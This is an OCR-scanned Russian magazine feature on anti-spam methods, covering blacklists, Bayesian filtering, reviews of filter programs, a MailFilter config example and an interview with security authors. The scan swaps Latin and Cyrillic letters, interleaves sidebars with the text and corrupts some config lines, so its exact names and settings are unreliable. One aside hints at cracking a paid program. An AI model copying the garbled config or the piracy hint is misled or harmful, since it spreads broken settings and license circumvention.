кому доверять? Для этой цели и был создан ре- 
сурс «Blacklists Compared», сравнивающий раз- 
личные DRBL-6a3b! по эффективности и приводя- 
щий еженедельные отчеты, доступные для всеоб- 
щего обозрения: www.sdsc.edu/~jeff/spam/Blacklists %- 
5FCompared.html. 

Другой интересный ресурс — www.trusted- 
source.org — позволяет в реальном времени отсле- 
живать почтовую активность различных доменов 
и |Р-адресов, выявляя «горячие точки». Эдакие 
своеобразные огнедышащие вулканы, из которых 
вместо лавы извергается спам. 

Имеются в Сети и своеобразные ловушки 
для спамеров, устроенные по типу капкана (напри- 
мер, http:///cbl.abuseat.org), собирающие IP-agpeca 
серверов, хотя бы однажды приславших им пись- 
мо, которого никто не ждал. Список адресов не 
разглашается напрямую, но любой желающий мо- 
жет ввести интересующий ero IP и бесплатно полу- 
чить информацию о том, был ли он замечен в спа- 
мерской активности или нет. 

«Белые списки» ведутся клиентами (или ад- 
министраторами почтовых узлов) и содержат адре- 
са доверительных серверов, принимать корреспон- 
денцию от которых необходимо вне зависимости 
от того, используются ли они спамерами или нет. 
Обычно в белые списки попадают узлы, «трансли- 
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The Bat! автоматически распознал спамерское письмо и пометил красным конвертом, но толку от этого 
ровно ноль — ведь загрузить его с сервера все равно пришлось 


рующие» почту от важных респондентов, потеря 
писем от которых доставляет большие неприятнос- 
ти (или убытки). Однако, как показывает статисти- 
ка, подавляющее большинство пользователей 
о белых списках даже и не подозревает! 

> — фильтруй базар. Простейшие фильтры ис- 
пользуют тривиальный сигнатурный анализ, скани- 
рующий письма на наличие характерных реклам- 
ных сообщений (отправить пять долларов, увели- 
чить, всунуть, вложить), что очень хорошо работает 
в кооперации с DRBL-6a3amn. Имея в своем распо- 
ряжении всего одно рекламное письмо, мы со 100% 
надежностью отследим все остальные (на многих 
почтовых серверах с меБ-интерфейсом есть ссыл- 
ка «пожаловаться на спам», а пользователи Outlook 
Express, The Bat! и других клиентов могут, согласно 
RFC-822, пересылать такие письма на адрес 
abuse @ domain.xxx, где domain.xxx — имя их почто- 
вого сервер, но далеко не везде и не всегда адми- 
нистратор почтовика реагирует надлежащим обра- 
зом). Процент ложных срабатываний у правильно 
настроенного сигнатурного фильтра относительно 
невысок, и в этом его главная слабость. Стоит cna- 
меру слегка видоизменить тело письма, как оно уже 
проходит мимо него незамеченным. 

Анализ по формальным критериям также 
относится к числу простейших и сверяет письмо 
с набором определенных шаблонов, характерных 
для массовой рассылки, но редко встречающих- 
ся в обычных письмах: большое количество полу- 
чателей, отсутствие в заголовке имени получате- 
ля и отправителя, поддельный или несуществую- 


щий адрес отправителя, пустое письмо с одной 
большой картинкой и случайно сгенерированной 
текстовой абракадаброй, предназначенной для 
«ослепления» сигнатурных анализаторов (кстати, 
в графические изображения также могут вно- 
ситься стохастические искажения, препятствую- 
щие сигнатурному анализу). Формальные фильт- 
ры автономны, не требуют связи с ОАВЕ-базами, 
очень быстро работают (зачастую «паля» письмо 
по одному лишь заголовку), практически не дают 
ложных срабатываний, но распознают незначи- 
тельный процент спамерских сообщений, что и 
неудивительно, так как послание, оформленное 
по всем правилам «этикета», ими благополучно 
пропускается. 

Лингвистические фильтры самые сложные 
и самые интеллектуальные. Они же самые эффек- 
тивные. Лучшие программы распознают от 80% 
до 90% спамерских сообщений, а в некоторых слу- 
чаях — еще больше. К сожалению, вместе с этим 
возрастает и процент ложных срабатываний — 
многие законопослушные письма расстреливают- 
ся без суда и следствия. Но, как говорится, лес ру- 
бят — щепки летят! 

Алгоритмы распознавания — самые разнооб- 
разные, в том числе и чисто статистические. Берем 
коллекцию спамерской корреспонденции, накоп- 
ленную за длительное время, и определяем часто- 
ту использования различных слов (и их комбина- 
ций), затем проделываем то же самое для коллек- 
ции «честной» корреспонденции и выделяем набор 
критериев (со своими весовыми значениями), поз- 


воляющих стой или иной вероятностью оценить ка- 
тегорию данного письма. Максимум, на что спосо- 
бен такой фильтр — переместить письмо в junk- 
folder или каким-то другим способом пометить его, 
чтобы пользователь не дергался каждый раз, отры- 
ваясь от работы, а разгребал отфильтрованные за- 
валы в свободное время. 

Настоящая революция в лингвистических 
фильтрах произошла в августе 2002 года. Началась 
она не с выстрела Авроры, а со статьи «А Plan for 
Spam» Пауля Грэхма (Paul Graham), в которой он 
предложил использовать Теорему Байеса (Bayesian 
theory) для распознавания спама: www.paul- 
graham.com/spam.html. А тремя годами позже вышла 
книжка «Ending Spam», добившая спам окончатель- 
но: amazon.com/exec/obidos/tg/detail/-/1593270526. 

Собственно, сам Томас Баейс (Thomas 
Bayes), родившийся в самом начале 18 века, к поч- 
товым рассылкам никакого отношения не имел и 
занимался статистикой, что позволило ему сфор- 
мулировать следующую теорему, ставшую одной 
из основных в теории вероятностей. Пусть А1, 
A2,..., Ап — некоторые попарно несовместимые со- 
бытия, хотя бы одно из которых обязательно насту- 
пает, и В — некоторое событие. Тогда, при наступ- 
лении события В, условная вероятность Ак может 
быть вычислена по определенной математической 
формуле, приведенной и в Большой Советской Эн- 
циклопедии, и на Википедии: http://en.wikipedia.org/- 
wiki/Bayesian_probability. Впрочем, Большая Советская 
Энциклопедия похоронила Теорему Байеса следу- 
ющими словами: «Теорему Баейса долгое время 
рассматривали как основу для статистических вы- 
водов из результатов наблюдений. Однако в при- 
менениях, как правило, отсутствуют достаточно 
обоснованные данные об априорных вероятностях 
гипотез. В силу этого Теорема Баейса потеряла 
свое значение». А вот и не потеряла, даже приоб- 
pena! Антиспамерские фильтры, основанные на Те- 
ореме Баейса (Bayesian spam filtering), в наши дни 
относятся к категории самых бурно развивающих- 
ся, самых популярных и самых эффективных. Ми- 
нимум убитых писем, максимум прибитого спама. 
Подробности также на Википедии: http://en.wikipedia.- 
org/wiki/Bayesian_filtering. 
> = супермаркет программного обеспечения. Te- 
ория — это хорошо и правильно. Но на голых знани- 
ях далеко не уедешь. Нам бы пулемет, да чтоб 
с патронами. Или, на худой конец, софтину какую- 
нибудь. Желательно подешевле. Программ имеет- 
ся великое множество. Как серверных, так и клиен- 
тских (впрочем, бесперспективность клиентских ре- 
шений уже отметили). 

В первую очередь следует обратить внима- 
ние на коллекцию открытых Bayesian-cbunbTpoB: 
http://spambayes.sourceforge.net/related.html. На них бази- 
руются многие продукты, реализованные как РОР- 
Ргоху серверы и как плагины к популярным почто- 
вым клиентам. Там же можно найти множество тех- 
нической информации относительно самих 
Вауез!ап-алгоритмов и вступить в ряды разработ- 
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чиков. К сожалению, в силу определенных техни- 
ческих трудностей, реализация полостью сервер- 
ного Bayesian-cbunbTpa (server-side Bayesian-filter) 
открытым сообществом пока не планируется, и 
приходится обращаться к другим производителям, 
а они, редиски такие, денежку хотят (но, учитывая 
суровую действительность российский условий, 
вряд ли получат). 

Среди отечественных разработок выделяется 
Езегу/З-сервер с интегрированным Ап#$рат-фильт- 
ром, имеющий серверные и клиентские версии, «пе- 
реваривающий» все основные почтовые протоколы 
(SMTP/POP3/IMAP/HTTP), реализующий Bayesian- 
фильтр и поддерживающий работу с DRBL-6a3amn. 
Однако продукт пока что «сыроват», а сайт (http://- 
eproxy.etype.net) содержит множество незаполненных 
страничек типа «under construction». Но и полезной 
информации на нем предостаточно. 

Другой европейский продукт — SPAMfighter 
(www.spamfighter.com), созданный двумя датскими 
парнями, реализован в виде расширения для серве- 
ров Microsoft Exchange 2000/Microsoft Exchange 
2003 и Outlook Express (сайт компании поддержива- 
ет 12 языков, среди которых есть и русский). По со- 
общению компании, он используется на 2.046.366 
серверах в 212 странах, что говорит о серьезности 
продукта и его готовности к «промышленной» 
эксплуатации. Останавливает лишь то, что за него 
просят $25 в год за каждого пользователя. 

Kaspersky Anti-Spam (www.kaspersky.ru/lin_anti- 
spam) навряд ли нуждается в комментариях. Это чис- 
то серверный продукт, причем ориентированный сов- 
сем не на Windows NT/Server 2003/Longhorn, а рабо- 
тающий под LINUX/FreeBSD и реализующий целый 
комплекс противоспамерских методик: фильтрацию 
с поддержкой черных (DRBL) и белых списков, сигна- 
турный поиск (распознающий в том числе и графи- 
ческий спам), анализ формальных признаков спама 
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и лингвистические эвристики, алгоритмы которых 
не разглашаются, но, судя по всему, работают они 
вполне успешно. Kaspersky Anti-Spam используется 
многими крупными компаниями, среди которых зна- 
чится и почтовый сервис тай.ги. Стоит это добро все- 
го $110 и работает целый год, после чего платить при- 
ходится снова. 

Не отстает от Касперского и Symantec со сво- 
им Norton Antispam  (www.symantec.com/search- 
landing/antispam), входящим в состав пакета Norton 
Internet Security, реализованного для операционных 
систем Microsoft Windows 2000 Server, Windows 
Server 2003, Sun Solaris 9/10 и Red Hat Linux ES/AS 
3.0. Естественно, имеются и клиентские модули, 
впрочем, они недостаточно эффективны. 

Лучшими клиентским анти-спамерским ре- 
шением для The Bat'a является плагин Bayesit! 
(www. ritlabs.com/ru/solutions/Bayesit.php). Работает он, 
как и следует из названия, по алгоритму Баейса, 
причем довольно успешно. Однако этой «успеш- 
ностью» могут насладиться лишь те, кому напле- 
вать на трафик — как ни крути, а скачивать письма 
с сервера все равно приходится и определить их 
принадлежность к спаму по одним лишь заголов- 
кам Bayeslt! не в силах! 
>» заключение. Пользователи бесплатных поч- 
товых систем не могут влиять на политику борьбы 
со спамом, и, по большому счету, им совершенно 
все равно, что на сервере стоит — Касперский или 
Нортон. Если спама станет приходить слишком 
много или, наоборот, не станет приходить то, что 
должно было прийти, они просто сменят север, 
благо сейчас их... А вот администраторы локаль- 
ных сетей стоят перед суровой экономической за- 
дачей, которую без калькулятора (и пол-литра) не 
решить. Если забыть о пиратстве и за устанавлива- 
емые фильтры честно платить по счетам, то... 
убытки от спама могут показаться не такими уж и 
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Статистический фильтр, проанализировав письмо, 
присвоил ему спам-рейтинг 3, что по десятибалльной 
шкале означает «spam not detected» 


значительными. Если же алгоритмы фильтрации 
работают с уже полученными письмами, с этим 
легко справляется и бесплатный Bayesit! © 


www.openrbl.org 
система автоматизированного поиска по базам на предмет 
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about OEM software 


Обзор программ борьбы co спамом 


УТРО. ТЫ ПРОСЫПАЕШЬСЯ ПОСЛЕ СЛАДКОГО СНА, ВКЛЮЧАЕШЬ КОМПЬЮТЕР, 
ПОДКЛЮЧАЕШЬСЯ К СЕТИ И СОБИРАЕШЬСЯ ПРОВЕРИТЬ СВОЮ МЫЛЬНИЦКУ. 

ПОСЛЕ УСПЕШНОЙ ЗАКАЧКИ ПИСЕМ НАСТРОЕНИЕ ИДЕТ НА УБЫЛЬ: ИЗ БОЛЬШОГО 
КОЛИЧЕСТВА ПИСЕМ ЛИШЬ ДВА ОТ ТВОИХ ДРУЗЕЙ, ВСЕ ОСТАЛЬНЫЕ — ЧИСТЫЙ СПАМ 


Spider_net (spider_net@inbox.ru), www.vr-online.ru 
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www.spamoed.com 

SPAMOED 4.6 

РАЗМЕР: 1,7 МБ 

Spamoed родом из России и создан 
для борьбы преимущественно с рус- 
ским спамом. По заверениям разра- 
ботчиков, Spamoed — послушный, об- 
ладает феноменальной памятью (под- 
держивает любое количество почто- 
вых акаунтов), редко ошибается 
в принятых решениях, не требовате- 
лен к месту обитания, быстрый как 
молния и вообще вундеркинд. Так ли 
это на самом деле? 

Первое, что бросается в глаза 
после установки, — внешность. Раз- 
работчики здесь явно переборщили. 
Программы, которые выполняют 
серьезные задачи, должны иметь 
стандартный фейс, а не быть раскра- 
шены как клоуны. Но интерфейс — 
все-таки дело вкуса, посмотрим 
на методы борьбы со спамом, кото- 
рыми обладает Spamoed. 

Spamoed, как и полагается no- 
добному ПО, работает с известными 
почтовыми клиентами. То есть он 
выступает посредником между тво- 
им e-mail клиентом и почтовым серве- 
ром. Для успешного сотрудничества 
его нужно настроить соответствую- 
щим образом. 

Spamoed бьется по правилам. 
Правила ты можешь создать вручную 


или натаскать Спамоеда на конкрет- 
ных примерах. Рекомендуется ис- 
пользовать первый способ, так как 
в этом случае можно быть уверен- 
ным, что Спамоед не удалит важных 
писем, ошибочно приняв их за спам. 
В правиле, к примеру, ты можешь 
указать, чтобы осуществлялся поиск 
некоторых часто употребляемых спа- 
мерами слов, а письма, их содержа- 
щие, помечались как спам. При жела- 
нии можешь объединять несколько 
условий. Чтобы повысить эффектив- 
ность работы, рекомендуется создать 
белый список, в котором должны 
быть адреса твоих друзей и тех лю- 
дей, с которыми ты ведешь постоян- 
ную переписку. В этом случае 
ты быстрее научишь Спамоеда отли- 
чать важные письма от спама. 
Настроив Spamoed, ты изба- 
вишься от рутинных действий по уда- 
лению спама. В твой ящик будут попа- 
дать только нужные письма. Если ты 
используешь настройки по умолча- 
нию, то перед анализом Spamoed ска- 
чивает все письма с сервера, а уже 
потом их анализирует. Если эконо- 
мишь трафик (читая почту, к примеру, 
через сотовый), поковыряйся в наст- 
ройках — можно заставить Spamoed 


не скачивать письма, а проводить их 
анализ по заголовкам. Но будь осто- 
рожен, так как неграмотно составлен- 
ные фильтры могут лишить тебя пи- 
сем, которые не являлись спамом. 

Еще одна возможность — де- 
тектор вирусов. Спамоед имеет 
собственную базу с сигнатурами из- 
вестных вирусов. Обнаружив в пись- 
ме враждебное вложение, спамоед 
сразу удалит мессагу. Антивирусная 
база периодически обновляется, так 
что возможность детектора вирусов 
можно взять на заметку. 

Преград на пути счастья две. Пер- 
вая — платность программы (хотя astala- 
vista может помочь). Но в demo-Bepcun 
недоступно множество возможностей 
программы, в частности, ты не можешь 
создавать правила, которые содержат 
более одного условия. А эта возмож- 
ность жизненно необходима. Вто- 
рая — обучаемость программы. Чтобы 
почувствовать все прелести работы 
Спамоеда, придется потратить некото- 
рое количество драгоценного времени 
на настройку. Если поторопиться, 
вместе со спамом будут удаляться 
нужные письма. Если отнестись нап- 
левательски, эффект, естественно, бу- 
дет нулевым. 


www.spampunisher.com 

SPAM PUNISHER 2.41 

PASMEP: 515,2 KB 

Spam Punisher не содержит системы 
фильтров и прочих привычных вещей 
для подобного рода программ. Как же 
тогда он работает? Оказывается, прак- 
тически у каждого провайдера есть 
специальные адреса, на которые при- 
нимаются жалобы о спаме. Эту воз- 
можность и использует Spam Punisher. 
Тебе необходимо скопировать заголо- 


вок письма со спамом и вставить его 
в окно программы. $Р разберет весь 
заголовок по частям, вытащит адрес 
отправителя, с которого пришел спам, 
и составит для службы поддержки 
письмо, в котором будет написано при- 
мерно следующее: «Один из ваших 
юзеров рассылает спам. Примите, по- 
жалуйста, меры». Также в жалобное 


письмо SP вставит !Р-адрес отправите- 
ля. После чего останется только ждать 
действий службы поддержки. 
Программа реально полезна 
в тех случаях, когда спам валится с од- 
НОГО ПОЧТОВОГО «релея». В этом случае 
есть шанс, что служба поддержки отре- 
агирует и пресечет дальнейшие попьт- 
ки рассылки спама через свой сервер. 


www.winantiaspam.ru 
WINANTISPAM 
PASMEP: 2.1 MB 
По сравнению co Spam Punisher 
WinAntiSpam просто титан. У этой 
программы примерно одинаковый 
набор функций со Spamoed'om. 
WinAntiSpam одинаково хорошо pa- 
ботает с TheBat! и ОЕ. Основной 
принцип работы — посредничество 
между почтовым клиентом и почто- 
вым сервером. 

Помимо привычных правил, 
в WinAntiSpam есть подтверждение от- 
правителем отправленного им письма. 
После того, как на почтовый сервер 
приходит письмо, его скачивает Win- 
AntiSpam, извлекает адрес отправите- 
ля и пишетему запрос (текст которого 
ты можешь заготовить сам). Если от- 
правитель ответит на письмо, то, соот- 
ветственно, ты его получишь. А если 
же нет, TO WinAntiSpam будет ждать 
п-ое количество дней, после чего уда- 
лит это письмо и внесет адрес отпра- 
вителя в черный список. 

Если ты регулярно принима- 
ешь на мыло вопросы от пользовате- 


лей, то это фича придется как нельзя 
кстати. Человек, которому нужен от- 
вет на вопрос, получив запрос 
от WinAntiSpam, непременно ответит 
на него. В результате хорошо всем. 

Минус, наверное, только один: 
иногда человек не может подтвер- 
дить, что отправленное им письмо — 
не спам. На это могут быть разные 
причины, самая банальная — отсут- 
ствие постоянного доступа к Сети. 
WinAntiSpam также позволяет создать 
правила для фильтрации. Ты можешь 
внести ключевые фразы (как в 
Spamoed'e), по которым WinAntiSpam 
будет распознавать и метитыьудалять 
спам. Еще одна возможность WinAnti- 
Зрат — блокировка писем по домен- 
ным зонам. Скажи, приятель, у тебя 
есть друзья в США, Австралии и так 
далее? Если нет, то можешь смело 
внести в запрещенный список домены 
этих стран. Таким образом, ты больше 
не будешь получать письма с рекла- 
мой, скажем, с ххх @provider.us. 


www.spam-blocker.adscleaner.com 
SPAMBLOCKER 2.3.09 
PASMEP: 1,6 MB 
SpamBlocker — еще один продукт от 
наших разработчиков. В отличие от 
WinAntiSpam и Spamoed, эта програм- 
ма не является посредником. Для pa- 
боты с SpamBlocker тебе потребуется 
ввести в нее данные своего почтового 
ящика и настроить правила, после че- 
го о программе можно забыть. 
SpamBlocker также имеет воз- 
можность создавать правила. На них, 
собственно, и строится вся его рабо- 
та. При добавлении новой учетной за- 
писи SB сразу же создает стандарт- 
ный набор правил: белый список ад- 
ресатов, спам по словам, черный спи- 
сок адресатов, спам по отправителю. 
В принципе, стандартный набор для 
подобных программ. Однако если 


приглядеться, то можно увидеть, что 
уже есть готовые списки для правил. 
Тебе не придется добавлять самому 
часто употребляемые спамерами сло- 
ва. К тому же этот список можно об- 
новлять через интернет. Это огром- 
ный плюс, так как настройка правил 
сводится лишь к нескольким щелч- 
кам мыши, минуя набивание слов, 
от которых и так тошнит. 

Минус программы — отсутствие 
возможности создавать правила для 
прикрепленных к письмам файлов. 
Ведь спамеры пишут рекламный текст 
не только в теле письма, а создают 
картинки с текстом. С таким спамом 
бороться сложнее, особенно если тема 
письма содержит осмысленный текст. 


НЕ ПОПАЛИ 
В ОБЗОР 


www.panicware.com 

SpamWasher 

Для борьбы со спамом использует 
систему фильтров и черные списки. 
Как и WinAntiSpam, позволяет бло- 
кировать письма по доменным 30- 
нам. Сразу после установки прог- 
раммы создается внушительный 
список правил. Созданные правила 
по умолчанию ориентированы на 
борьбу с забугровым спамом, так 
как часто употребляемые спамера- 
ми фразы написаны преимущест- 
венно на английском языке. TheBat! 
не поддерживается. 


www.antispamer.webs.com.ua 
AntiSpamer 

Работает по такому же принципу, 
как и SpamWasher. 


www.pcprivacysoftware.com 
SpamSweeper 

Использует систему фильтров 

и списков. К тому же в программе 
предусмотрен детектор вирусов. 
Разработчики явно переборщили 

с яркими цветами, в результате 
программа больше похожа на ново- 
годнюю елку. 


Оценки профпригодности 
Программа 


Spamoed 4.6 


Интерфейс 


Выполнение своей работы 


Оригинальные идеи 


Spam Punisher 2.41 


WinAntiSpam 3.0 


SpamBlocker 2.3.09 
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Тебя пытаются убедить купить гламурную сумочку 
за пару тысяч американских президентов... Разме- 
ренно удаляешь ненужный мусор. Но завтра все 
повторится. Что же делать? Неужели придется му- 
читься так каждый день? Срочно нужно обзавес- 
тись необходимым софтом и забыть о проблеме. 

Хотя даже при использовании спецпрограмм 
ты не убережешь себя на 100%. Спамеры не сидят 
на месте и изучают подобный софт. Ведь если они 
не будут совершенствовать приемы рассылки рек- 
ламы, то останутся без работы, а, следовательно, и 
без денег. Поэтому, как бы ты не пытался бороться 
со спамом, в сухую все равно не выиграть. Но мож- 
но попытаться выжать максимум из доступного. 
> защита OT спама. Разработчики почтовых кли- 
ентов стараются встраивать в свои программы прос- 
тенькие модули анализаторов спама. Конечно, они ус- 
тупают возможностям программ, описанных в статье, 
но они помогут разгрести спам в твоем ящике. 

Если ты используешь Outlook Express, то зай- 
ди в «Сервис > Правила для сообщений -+ Почта». 
В появившимся окне можешь создать правила для 
входящей почты, а также черный список адресатов. 
Создание правил в ОЕ напоминает аналогичные 
действия, выполняемые в Спамоеде. Даже окно, 
в котором создается новое правило, выглядит ана- 
логично, только возможных условий меньше. 


Пример конфига для MailFilter 


LOGFILE = /home/Spider_NET/.log 
Уровень взаимодействия с пользователем. Всего 6 уровней. Гсли ты не хочешь видеть 


сообщения MF, то используй 1. пекомендуется уровень 3 или 4. 
6-й уровень используй для тестирования новых правил, при использовании этого 
# уровня МЕ будет выводить всю информацию о текущем состоянии. 


VERBOSE = 6 


астройка учетной записи. МЕ поддерживает любое количество учетных записей. 
SERVER = 


USER = 

PASS = 
PROTOCOL = pop3 
PORT = 110 


азличать регистр букв при фильтровании? 

REG_CASE = no 

# пип применяемых регулярных выражений — основной или расширенный (extended | basic) 
ВЕС_ТУРЕ = basic 


Максимальный размер письма. Письма большего размера будут удаляться. 
MAXSIZE_DENY = 1000000 


#Далее идет описание правил 
DENY_NOCASE=*Subject: . *=\?Windows-1251\?Q\?.*=F1=EF=E0=EC\ ?= 
DENY = *Subject:.*porno 


Должен ли MF преобразовывать текст в нормальный вид. 
# ',L.E-G,A.L; ,C.A-BULUE, +.B-OUX) ;DUEUS,C;R,A.MB;L,E.R-]' 
# ‘сли да, то текст будет таким: 'LEGAL CABLE BOX DESCRAMBLER' which can be filtered. 


NORMAL = yes 


онлайн борьба 
со спамом 


ПОМИМО ПРИКЛАДНЫХ ПРОГРАММ 
ДЛЯ ЗАЩИТЫ ОТ СПАМА СУЩЕСТВУЮТ 
ОНЛАЙН-ВЕРСИИ. ИДЕЯ 
ИСПОЛЬЗОВАНИЯ ИХ ДОВОЛЬНО 
ИНТЕРЕСНА, ТАК КАК 

ОТ ПОЛЬЗОВАТЕЛЯ НЕ ТРЕБУЕТСЯ 
НИКАКИХ СПЕЦИАЛЬНЫХ ЗНАНИЙ 

И ВРЕМЕНИ НА НАСТРОЙКУ. 
ДОСТАТОЧНО ЗАРЕГИСТРИРОВАТЬСЯ 
В СИСТЕМЕ И ПОЛУЧИТЬ СПЕЦИАЛЬНЫЙ 
E-MAIL АДРЕС, КОТОРЫЙ БУДЕТ 
ВЫСТУПАТЬ ПОСРЕДНИКОМ. 


НАГЛЯДНЫЙ ПРИМЕР. ДЛЯ ТЕБЯ 
СОЗДАЕТСЯ СПЕЦИАЛЬНЫЙ ПОЧТОВЫЙ 
ЯЩИК (SPIDER_NET @ SPAMTEST.RU, 
НАПРИМЕР). ЗАТЕМ В ТВОЕМ РЕАЛЬНОМ 
ПОЧТОВОМ ЯЩИКЕ НЕОБХОДИМО 
НАСТРОИТЬ ПЕРЕАДРЕСАЦИЮ 

НА СОЗДАННЫЙ ЯЩИК. ПОСЛЕ ЭТОГО 
ВСЕ ПИСЬМА С ТВОЕГО ЯЩИКА БУДУТ 
ОТПРАВЛЯТЬСЯ НА ЯЩИК-ФИЛЬТР, 
АСНЕГО — ОБРАТНО ТЕБЕ. ПОСЛЕ 
ФИЛЬТРАЦИИ ТЫ ПОЛУЧИШЬ ПИСЬМО 
С ОСОБОЙ ПОМЕТКОЙ, ПО КОТОРОЙ 
БУДЕТ ВИДНО, СПАМ ЭТО ИЛИ НЕТ. 

В КАЧЕСТВЕ ТАКИХ СЕРВИСОВ 
РЕКОМЕНДУЕМ WWW.SPAMTEST.RU 

ОТ ЛАБОРАТОРИИ КАСПЕРСКОГО 

И WWW.SPAMOOBORONA.RU ОТ YANDEX. 


ALLOW = “From: .*a_friend_with_account@any_provider_that_spams.org 


ALLOW = *Subject:.*mailfilter 


Пользователям TheBat! для того, чтобы настроить 
защиту от спама, придется потратить чуть больше 
времени, так как им надо скачать специальный пла- 
гин — www.spamprotexx.ru. Остальное — по аналогии. 
> — акакже Linux? Если ты линуксоид и тебе нуж- 
на достойная и в тоже время простая программа 
для борьбы со спамом, советуем обратить внима- 
ние на MailFilter (http://mailfilter.sourceforge.net). Уста- 
новка не вызывает особых проблем, никаких допол- 
нительных библиотек для компиляции MailFilter 
не требуется. После установки необходимо создать 
конфиг в своем домашнем каталоге. В качестве 
имени конфига укажи .mailfilterrc. 

У MailFilter нет графического интерфейса, 
а значит, все правила для фильтрации нужно про- 
писывать ручками в конфиг. Как правильно соста- 
вить конфигурационный файл, сказано в README. 

МЕ работает напрямую с почтовым сервером 
(кстати, это понятно из конфига). МЕ нужно запускать 
до запуска почтового клиента. MF проверяет почту 
на спам со всех серверов, указанных в конфиге. 

MailFilter также определяет спам по создан- 
ным правилам, но главное отличие MF от подобных 
Windows-nporpamm — поддержка регулярных выра- 
жений. Благодаря их использованию эффектив- 
ность созданных правил выше. Другой плюс МЕ — 
возможность работать непосредственно на серве- 
ре, а значит, тебе не придется качать гору спама, 
тратя драгоценный трафик и время. 


Как и подобает спам-фильтру, МЕ позволяет 
создавать белые и черные списки отправителей. 
На добавленных в белый список отправителей не 
будут действовать все остальные правила, поэтому 
друзья могут слать тебе все что угодно. 

При добавлении правил в конфиг у тебя могут 
возникнуть проблемы с фразами на русском языке. 
Если просто вписать часто употребляемую спаме- 
рами фразу на русском, то MF начнет ругаться и от- 
кажется выполнять свою работу. Чтобы обойти это 
ограничение, можешь указать коды символов в hex- 
формате. Сначала указываешь кодировку, а потом 
коды символов через знак равенства. В результате 
все работает. 
> = итог. Спам — это проблема, с которой необхо- 
димо бороться. Спамеры чуть ли не каждый день 
придумывают новые способы обхода фильтров, 
а программисты, в свою очередь, добавляют в свои 
программы какие-то уникальные фишки. Это война, 
и, скорее всего, она никогда не кончится. Поэтому 
выход только один — постоянно быть в курсе, своев- 
ременно обновлять ПО и стараться не допустить по- 
падания своего адреса в руки спамеров © 


www.spamoborona.ru 
проект, пропагандирующий борьбу со спамом 


www.spamtest.ru 
онлайн проверка Ha спам 


www.spamprotexx.ru 
антиспам-плагин для TheBat! 


ЗРЕСТАЕИНТЕРВЬЮ 


|| ЧТО ДУМАЕШЬ 
О СПАМЕРАХ? 


|| КАК ТЫ БОРЕШЬСЯ СО СПАМОМ? 
КАКИЕ ПРОГРАММЫ ИСПОЛЬЗУЕШЬ? 


ЧТО ДУМАЕШЬ О ВНЕСЕННОЙ 
ПОПРАВКЕ В ЗАКОН «О РЕКЛАМЕ»? 
СТАНЕТ ЛИ ПОСЛЕ ЭТОГО СПАМЕРОВ 
МЕНЬШЕ? 


КАКОЙ ПУТЬ БОРЬБЫ СО СПАМОМ 
ВЕРНЫЙ: ЧАСТОЕ ОБНОВЛЕНИЕ 
СПАМ - ФИЛЬТРОВ ИЛИ 
ЗАКОНОДАТЕЛЬНОЕ РЕШЕНИЕ 
ВОПРОСА? 


|| КАКАЯ ОПТИМАЛЬНАЯ МЕРА 
НАКАЗАНИЯ ЗА СПАМ? 


СТАНЕТ ЛИ СПАМА МЕНЬШЕ 
ИЛИ ЕГО КОЛИЧЕСТВО БУДЕТ РАСТИ, 
ТВОЙ ПРОГНОЗ? 


ЗАРАЗА 
известный 
зесигЙу-специалист, 
владелец сайта 
www.security.nnov.ru 


МИХАИЛ ФЛЕНОВ 
известен по своим 
книгам и 
многочисленным 
статьям в журналах 


ЗАРАЗА: Проблема спама неоднозначна, так же как и проблема рекламы. Понятно, что от рекламы в ин- 
тернете никуда не денешься, так как это бизнес, благодаря которому существуют многие популярные ре- 
сурсы. Но если реклама Ha web-pecypcax преимущественно цивилизованная и тематическая (человек ви- 
дит только ту рекламу, которая действительно может его заинтересовать), то с рекламой в электронной 
почте творится бардак. Чтобы «зацепить» одного пользователя, который может заинтересоваться рекла- 
мой, письмо очень часто рассылается на 10000 адресов, что совершенно недопустимо. К сожалению, рек- 
ламодатели не понимают, что выгодней разослать рекламу «маленькими тиражами» заинтересованным 
людям, чем рассылать ее по миллионам адресов. А раз есть спрос — есть и предложение. 

МИХАИЛ ФЛЕНОВ: Все это из-за идиотизма и ламерства. Если бы ламеры не кликали по этим ссылкам, 
то спамеры уже давно бы загнулись. Атак как это самый лучший способ продвижения, то рекламщики бу- 
дут платить спамерам за рассылку мусора. У меня есть один ящик, который я использую только для об- 
щения на англоязычных ресурсах, и он существует уже более 5 лет. Спам на нем составляет не более 10%, 
а в российских ящиках у меня не менее 70% спама. 

На российском рынке ламеров больше, соответственно, и спама больше. 


ЗАРАЗА: Использую собственную систему фильтрации, основанную на стандартных возможностях 
Postfix с небольшими модификациями исходного кода. 

МИХАИЛ ФЛЕНОВ: Никаких. Программы ошибаются, а я стараюсь отвечать всем. Поэтому лучше лиш- 
ний раз увижу спам-письмо, зато не пропущу вопрос читателя. Поэтому мой главный антиспам — систе- 
ма «зоркий глаз 1.0». 


ЗАРАЗА: Тот, кто продает фальшивые лекарства и поддельные Rolex, вряд ли обратит внимание на эту 
поправку. Но поправка — шанс сформировать легальный рынок почтовой рекламы, как это (хоть и со 
скрипом) происходит в Штатах. Если такой рынок будет сформирован, то у рекламодателя будет выбор, 
и многие воспользуются услугами легального агентства, распространяющего информацию по подписке. 
МИХАИЛ ФЛЕНОВ: Не читал. Думается, что законы читать смысла нет, особенно в сфере ИТ, потому 
что они не работают. Как может закон работать в ИТ, когда его пишут люди, ничего в этом не понимаю- 
щие? У нас появилось много законов в сфере ИТ, ну и что? Хакеров стало меньше? Нет, и не станет! По- 
тому что даже следить за этими законами некому. Кто будет вылавливать спамеров? Управление К? 
Не смешите мои кроссовки! Выставить штраф заказчику нереально, а найти спамера — это вообще из 
области фантастики. 


ЗАРАЗА: Оба пути тупиковые. Борьба со спамом — такое же зло, как и сам спам. Из двух зол каждому 
приходится выбирать меньшее. Законодательно проблемы спама тоже не решить. Фактически, большая 
часть спама рассылается через ботнеты, а использование ботнета (использование вредоносного ПО) на- 
рушает статьи уголовного кодекса, по которым предусмотрены существенные наказания. И как это помо- 
гает? Есть задача сформировать нормальный рекламный рынок. Она должна решаться совместно про- 
вайдерами, ОМ-агентствами и общественностью. И даже спамерами! В этом заинтересованы все, кто хоть 
как-то смотрит в будущее. 

МИХАИЛ ФЛЕНОВ: Научить народ не кликать по ссылкам в спаме. Пока народ кликает, никакие зако- 
ны и фильтры не помогут. 


ЗАРАЗА: «За спам» наказывать нельзя. Можно наказывать рекламодателя за нарушение зако- 
на «О рекламе»и распространителя за использование вредоносного кода или нарушение соглашений 
с провайдером. Она должна быть достаточной, чтобы все стороны были заинтересованы в переходе на 
легальные отношения. 

